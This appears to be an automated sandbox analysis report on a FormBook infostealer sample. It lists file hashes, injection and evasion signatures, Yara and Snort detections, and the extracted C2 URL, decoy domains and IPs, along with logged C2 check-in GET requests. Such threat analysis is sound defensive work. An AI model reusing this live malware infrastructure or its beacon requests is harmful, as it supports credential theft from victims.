Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Sample Name:	primosdv3.1.1.0.exe
Analysis ID:	715075
MD5:	633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1:	f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256:	0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Found hidden mapped module (file has been removed from disk)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

File is packed with WinRar

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F61A.tmp

Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

ReversingLabs: Detection: 23%

Machine Learning detection for sample

Source: primosdv3.1.1.0.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.bstkiooen.exe.1010000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.3a2f840.4.unpack	Avira: Label: TR/ATRAPS.Gen5
Source: 2.2.bstkiooen.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.60d900.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}

Uses 32bit PE files

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 4x nop then pop edi

2_2_0040E471

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.nordenergogrup.store/sk29/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.224.212.221 103.224.212.221

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 03 Oct 2022 14:00:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 284Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>

Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.nordenergogrup.store

Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1Host: www.nordenergogrup.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1Host: www.sandstormcase.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Creates a DirectInput object (often for capturing keystrokes)

Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
